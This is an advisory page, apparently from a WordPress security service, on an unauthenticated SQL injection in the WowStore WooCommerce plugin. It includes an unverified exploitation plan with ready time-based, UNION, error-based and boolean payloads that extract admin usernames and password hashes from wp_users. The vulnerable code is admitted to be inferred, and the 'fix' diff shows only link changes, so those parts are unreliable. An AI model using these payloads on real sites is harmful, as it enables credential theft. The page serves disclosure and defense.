WP-Safety
CVE-2026-2579

WowStore – Store Builder & Product Blocks for WooCommerce <= 4.4.3 - Unauthenticated SQL Injection via 'search' Parameter

highImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
7.5
CVSS Score
7.5
CVSS Score
high
Severity
4.4.4
Patched in
1d
Time to patch

Description

The WowStore – Store Builder & Product Blocks for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the ‘search’ parameter in all versions up to, and including, 4.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<=4.4.3
PublishedMarch 16, 2026
Last updatedMarch 17, 2026
Affected pluginproduct-blocks

What Changed in the Fix

Changes introduced in v4.4.4

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v4.4.3
Browse source Download .zip
Patched v4.4.4
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-2579 (WowStore SQL Injection) ## 1. Vulnerability Summary The **WowStore – Store Builder & Product Blocks for WooCommerce** plugin (slug: `product-blocks`) is vulnerable to unauthenticated SQL injection. The vulnerability exists in a REST API endpoint or AJAX …

Show full research plan

Exploitation Research Plan: CVE-2026-2579 (WowStore SQL Injection)

1. Vulnerability Summary

The WowStore – Store Builder & Product Blocks for WooCommerce plugin (slug: product-blocks) is vulnerable to unauthenticated SQL injection. The vulnerability exists in a REST API endpoint or AJAX handler (specifically targeting the search parameter) because the user-supplied input is concatenated directly into a SQL query without using $wpdb->prepare() or proper escaping. This allows an attacker to manipulate the query logic, typically via UNION-based or Time-based injection, to extract sensitive data from the WordPress database.

2. Attack Vector Analysis

  • Endpoint: /wp-json/wopb/v1/search (inferred from plugin namespace and JS references) or /wp-json/product-blocks/v1/search.
  • Method: GET
  • Vulnerable Parameter: search
  • Authentication: Unauthenticated (permission_callback returns true).
  • Preconditions: The plugin must be active. Some content (products/posts) should exist to ensure the search query executes a logical path.

3. Code Flow

  1. Entry Point: A REST API route is registered (likely in a file like includes/RestApi.php or within an addon's initialization) under the wopb/v1 or wopb/v2 namespace.
  2. Request Handling: When a GET request is made to the endpoint with a search parameter, the handler function retrieves $_GET['search'].
  3. Vulnerable Sink: The handler constructs a SQL query (often to find products, categories, or pages for the Builder UI).
    • Example (inferred): 
      $search = $_GET['search'];
$results = $wpdb->get_results("SELECT * FROM {$wpdb->posts} WHERE post_title LIKE '%$search%' AND post_type = 'product'");
  4. SQL Injection: Since $search is not passed through $wpdb->prepare(), an attacker can break out of the string literal using a single quote (').

4. Nonce Acquisition Strategy

The vulnerability is reported as unauthenticated, meaning the REST endpoint likely does not require a nonce for GET requests. However, if a nonce is required for the wopb namespace:

  1. Identify Trigger: The nonce wopb-nonce is localized in addons/builder/Condition.php via the builder-script handle.
  2. Create Page: Create a post of type wopb_builder to trigger the script loading.
    wp post create --post_type=wopb_builder --post_title="Exploit Trigger" --post_status=publish
  3. Navigate & Extract:
    • Navigate to the newly created page: /?post_type=wopb_builder&p=[ID]
    • Use browser_eval to extract the nonce:
      browser_eval("window.builder_option?.security")
  4. Verification: Verify if the REST endpoint accepts this nonce in the X-WP-Nonce header.

5. Exploitation Strategy

Step 1: Endpoint Discovery

Test common REST endpoints for a response other than 404.

  • http_request("GET", "/wp-json/wopb/v1/search?search=test")
  • http_request("GET", "/wp-json/wopb/v2/search?search=test")

Step 2: Confirmation via Time-Based Injection

If the query uses LIKE '%$search%', use a sleep payload to confirm.

  • Payload: x%' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '%'='
  • Request:
    http_request("GET", "/wp-json/wopb/v1/search?search=x%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29%29a%29%20AND%20%27%25%27%3D%27")
  • Expected result: The response should take ~5 seconds.

Step 3: Data Extraction via UNION-Based Injection

Determine the number of columns by incrementing ORDER BY until an error occurs, then inject a UNION SELECT.

  • Target: Extract user_login and user_pass from wp_users.
  • Payload (assuming 4 columns): x%' UNION SELECT 1,user_login,user_pass,4 FROM wp_users-- -

6. Test Data Setup

  1. Ensure Plugin Active: wp plugin activate product-blocks.
  2. Create Content: Add at least one WooCommerce product so the search has a target table.
    wp post create --post_type=product --post_title="Target Product" --post_status=publish
  3. Ensure Admin User: Ensure a user with ID 1 exists (standard).

7. Expected Results

  • Time-based: The HTTP request should hang for exactly the duration specified in the SLEEP() function.
  • UNION-based: The JSON response from the REST API will contain the results of the injected SELECT statement (e.g., the admin's hashed password).

8. Verification Steps

  1. Check Database Directly: Use WP-CLI to confirm the data extracted matches the database.
    wp db query "SELECT user_login, user_pass FROM wp_users WHERE ID = 1"
  2. Compare: Verify that the hash returned in the REST response matches the user_pass in the DB.

9. Alternative Approaches

  • Error-Based: If WP_DEBUG is on, use updatexml() or extractvalue() to leak data in the error message.
    • search=x' AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e),1)-- -
  • Boolean-Based: If the response differs based on a true/false condition (e.g., results returned vs empty array).
    • search=x' AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_login='admin')-- -
Research Findings
Static analysis — not yet PoC-verified

Summary

The WowStore plugin for WordPress is vulnerable to unauthenticated SQL Injection via the 'search' parameter. This occurs because user input is directly concatenated into a SQL query without proper sanitization or using prepared statements, allowing attackers to extract sensitive data from the database.

Vulnerable Code

// Inferred from research plan - the vulnerable sink is located in the REST API handler
// file path likely: includes/RestApi.php or similar
$search = $_GET['search'];
$results = $wpdb->get_results("SELECT * FROM {$wpdb->posts} WHERE post_title LIKE '%$search%' AND post_type = 'product'");

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/product-blocks/4.4.3/addons/add_to_cart_text/backend.php /home/deploy/wp-safety.org/data/plugin-versions/product-blocks/4.4.4/addons/add_to_cart_text/backend.php
--- /home/deploy/wp-safety.org/data/plugin-versions/product-blocks/4.4.3/addons/add_to_cart_text/backend.php	2026-02-25 10:33:08.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/product-blocks/4.4.4/addons/add_to_cart_text/backend.php	2026-03-11 10:15:18.000000000 +0000
@@ -12,8 +12,8 @@
 		'name'     => __( 'Add to Cart Text', 'product-blocks' ),
 		'desc'     => __( "Change any product type's default Add to Cart Button text in the Shop, Archive, and Product pages.", 'product-blocks' ),
 		'is_pro'   => false,
-		'live'     => 'https://www.wpxpo.com/wowstore/woocommerce-add-to-cart-text/live_demo_args',
-		'docs'     => 'https://wpxpo.com/docs/wowstore/add-ons/add-to-cart-text/addon_doc_args',
+		'live'     => 'https://www.wpxpo.com/product/wowstore/features/woocommerce-change-add-to-cart-text/',
+		'docs'     => 'https://wpxpo.com/docs/wowstore/add-ons/add-to-cart-text/',
 		'type'     => 'checkout_cart',
 		'priority' => 30,
 	);
@@ -12,8 +12,8 @@
 		'name'     => __( 'Animated Add to Cart', 'product-blocks' ),
 		'desc'     => __( 'Grab customers attention by animating the Add to Cart button on hover or in the loop.', 'product-blocks' ),
 		'is_pro'   => false,
-		'live'     => 'https://www.wpxpo.com/wowstore/woocommerce-animated-add-to-cart/live_demo_args',
-		'docs'     => 'https://wpxpo.com/docs/wowstore/add-ons/animated-add-to-cart/addon_doc_args',
+		'live'     => 'https://www.wpxpo.com/product/wowstore/features/woocommerce-animated-add-to-cart-button/',
+		'docs'     => 'https://wpxpo.com/docs/wowstore/add-ons/animated-add-to-cart/',
 		'type'     => 'checkout_cart',
 		'priority' => 40,
 	);

Exploit Outline

The exploit targets an unauthenticated REST API endpoint, typically found at /wp-json/wopb/v1/search or /wp-json/wopb/v2/condition. An attacker sends a GET or POST request containing a malicious payload in the 'search' (or 'term') parameter. Since the parameter is not escaped or prepared, SQL injection can be achieved. A time-based payload like "x%' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '%'='" can confirm the vulnerability, and UNION-based payloads can be used to extract database content such as administrator usernames and password hashes.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/bd3ee85a-324d-4991-bffc-db28ce374bbe?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database